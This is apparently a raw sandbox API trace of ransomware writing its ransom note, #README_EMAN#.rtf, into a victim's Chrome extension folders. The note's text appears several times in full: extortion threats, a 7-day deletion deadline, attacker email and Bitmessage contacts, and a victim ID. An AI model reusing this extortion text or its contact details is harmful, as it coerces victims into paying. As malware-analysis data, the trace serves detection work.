r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n3ÉD\x8bÃ3ÉèsøÿÿH\x83Ä0[ÃÌÇD$\x10\x03\x15", lpUsedDefaultChar=0x0) returned 8717 [0281.858] WriteFile (in: hFile=0x27c, lpBuffer=0x1ed55a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ed55a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.863] CloseHandle (hObject=0x27c) returned 1 [0281.863] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0281.864] GetLastError () returned 0x2 [0281.864] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0282.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0282.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 